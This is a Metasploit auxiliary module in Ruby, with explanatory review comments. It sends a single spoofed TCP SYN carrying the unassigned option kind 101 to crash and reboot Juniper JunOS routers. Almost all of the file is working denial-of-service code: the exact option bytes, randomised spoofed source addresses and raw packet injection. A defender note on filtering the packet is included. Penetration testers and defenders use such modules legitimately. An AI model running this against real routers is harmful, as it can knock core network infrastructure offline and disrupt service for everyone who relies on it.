Path: blob/master/modules/auxiliary/dos/tcp/junos_tcp_opt.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary DoS module: crafts a single TCP SYN carrying TCP option kind 101
# (0x65) and injects it towards RHOST through the Capture mixin's pcap
# interface. Source address and both ports are randomised unless the operator
# sets SHOST/SPORT/RPORT explicitly, so the packet's source is spoofed and no
# reply is expected or read back.
#
# For defenders: the distinguishing artefact on the wire is a SYN whose option
# list begins with kind 101 (the byte 0x65) — option kinds in this range are
# not assigned, so such segments can be matched and dropped at a filtering
# device before they reach the router.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Capture
  include Msf::Auxiliary::Dos

  # Module metadata plus the three optional datastore knobs. FILTER, PCAPFILE
  # and SNAPLEN (inherited from the Capture mixin) are removed because this
  # module only transmits and never sniffs.
  def initialize
    super(
      'Name' => 'Juniper JunOS Malformed TCP Option',
      'Description' => %q{
        This module exploits a denial of service vulnerability
        in Juniper Network's JunOS router operating system. By sending a TCP
        packet with TCP option 101 set, an attacker can cause an affected
        router to reboot.
      },
      'Author' => 'todb',
      'License' => MSF_LICENSE,
      'References' => [
        ['BID', '37670'],
        ['OSVDB', '61538'],
        ['URL', 'http://praetorianprefect.com/archives/2010/01/junos-juniper-flaw-exposes-core-routers-to-kernal-crash/']
      ],
      'Notes' => {
        # Declared impact: the target OS crashes and restarts; no persistent
        # side effects are claimed.
        'Stability' => [CRASH_OS_RESTARTS],
        'SideEffects' => [],
        'Reliability' => []
      }
    )

    register_options([
      OptInt.new('RPORT', [false, 'The destination port (defaults to random)']),
      OptInt.new('SPORT', [false, 'Source port (defaults to random)']),
      OptAddress.new('SHOST', [false, 'Source address (defaults to random)'])
    ])

    deregister_options('FILTER', 'PCAPFILE', 'SNAPLEN')
  end

  # Destination port. Unset, blank or 0 means "pick one at random".
  # @return [Integer]
  # NOTE(review): rand(0xffff) yields 0..65534, so the random path can produce
  # port 0 and never 65535 — confirm that is intended.
  def rport
    datastore['RPORT'].to_i.zero? ? rand(0xffff) : datastore['RPORT'].to_i
  end

  # Source port, same semantics and same rand(0xffff) range as #rport.
  # @return [Integer]
  def sport
    datastore['SPORT'].to_i.zero? ? rand(0xffff) : datastore['SPORT'].to_i
  end

  # Source address: SHOST if the operator set one, otherwise a random IPv4
  # address drawn from the entire 32-bit space. No reserved or unroutable
  # ranges (loopback, multicast, 0.0.0.0/8, ...) are excluded.
  # @return [String] dotted-quad address
  def shost
    datastore['SHOST'] || IPAddr.new(rand(0xffffffff), Socket::AF_INET).to_s
  end

  # Builds and injects exactly one packet per run. open_pcap/close_pcap come
  # from the Capture mixin; injecting raw frames presumably needs the usual
  # pcap privileges on the attacking host — verify against the mixin.
  def run
    open_pcap

    p = PacketFu::TCPPacket.new
    p.ip_daddr = rhost
    p.ip_saddr = shost
    p.ip_ttl = rand(128..255)
    p.tcp_sport = sport
    p.tcp_dport = rport
    p.tcp_flags.syn = 1
    p.tcp_win = rand(1..4096)
    # Option bytes: "e" is 0x65 = kind 101, then length 2, NOP (0x01), EOL (0x00).
    p.tcp_opts = "e\x02\x01\x00" # Opt 101, len 2, nop, eol
    # Recompute length/checksum fields now that every header field is set.
    p.recalc
    print_status("#{p.ip_daddr}:#{p.tcp_dport} Sending TCP Syn packet from #{p.ip_saddr}:#{p.tcp_sport}")
    # Fire-and-forget: the source is spoofed, so any SYN/ACK or RST goes to
    # shost, not to us, and nothing is read back here.
    capture_sendto(p, rhost)
    close_pcap
  end
end